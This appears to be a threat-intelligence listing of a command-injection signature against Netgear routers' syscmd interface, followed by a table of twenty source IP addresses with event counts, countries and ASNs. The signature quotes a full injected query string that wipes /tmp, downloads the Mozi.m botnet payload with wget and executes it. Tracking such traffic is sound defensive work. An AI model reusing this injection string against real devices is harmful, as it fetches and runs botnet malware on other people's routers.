Loading threats
HTTP query string containing next_file=netgear.cfg&todo=syscmd&cmd=rm -rf /tmp/*;wget http://*:*/Mozi.m -O /tmp/netgear;sh netgear&curpath=/¤tsetting.htm=1, representing a command injection attempt leveraging the syscmd interface to remove temporary files, download Mozi.m, and execute it.
| IP Address | Risk | Events | Sessions | Country | ASN | Last Seen |
|---|---|---|---|---|---|---|
| 103.93.93.211 | 100% | 139,574 | 8,410 | 🇮🇩 ID | AS141140 | 2026-03-18 |
| 103.93.93.182 | 100% | 91,254 | 5,783 | 🇮🇩 ID | AS141140 | 2026-03-19 |
| 102.212.40.100 | 100% | 57,520 | 3,466 | 🇳🇬 NG | AS329244 | 2026-03-18 |
| 103.13.138.22 | 100% | 30,504 | 1,878 | 🇮🇩 ID | AS150215 | 2026-03-18 |
| 223.123.38.36 | 100% | 26,586 | 1,417 | 🇵🇰 PK | AS138423 | 2026-03-17 |
| 223.123.43.1 | 100% | 24,073 | 1,210 | 🇵🇰 PK | AS138423 | 2026-03-18 |
| 223.123.43.69 | 100% | 23,778 | 1,273 | 🇵🇰 PK | AS138423 | 2026-03-18 |
| 223.123.43.7 | 100% | 23,353 | 1,256 | 🇵🇰 PK | AS138423 | 2026-03-18 |
| 223.123.38.34 | 100% | 22,369 | 1,450 | 🇵🇰 PK | AS138423 | 2026-03-18 |
| 223.123.43.0 | 100% | 21,285 | 1,267 | 🇵🇰 PK | AS138423 | 2026-03-18 |
| 223.123.43.71 | 100% | 19,875 | 1,175 | 🇵🇰 PK | AS138423 | 2026-03-18 |
| 223.123.43.6 | 100% | 18,718 | 1,105 | 🇵🇰 PK | AS138423 | 2026-03-19 |
| 223.123.43.70 | 100% | 16,929 | 1,208 | 🇵🇰 PK | AS138423 | 2026-03-18 |
| 223.123.38.37 | 100% | 15,800 | 1,499 | 🇵🇰 PK | AS138423 | 2026-03-18 |
| 223.123.43.68 | 100% | 15,647 | 1,207 | 🇵🇰 PK | AS138423 | 2026-03-18 |
| 223.123.38.38 | 100% | 13,424 | 1,109 | 🇵🇰 PK | AS138423 | 2026-03-18 |
| 175.107.205.211 | 100% | 5,840 | 439 | 🇵🇰 PK | AS9541 | 2026-03-18 |
| 105.114.21.250 | 100% | 4,968 | 1,341 | 🇳🇬 NG | AS36873 | 2026-03-11 |
| 66.167.166.136 | 100% | 4,637 | 137 | 🇵🇰 PK | AS9541 | 2026-03-04 |
| 14.46.115.236 | 100% | 4,432 | 159 | 🇰🇷 KR | AS4766 | 2026-02-28 |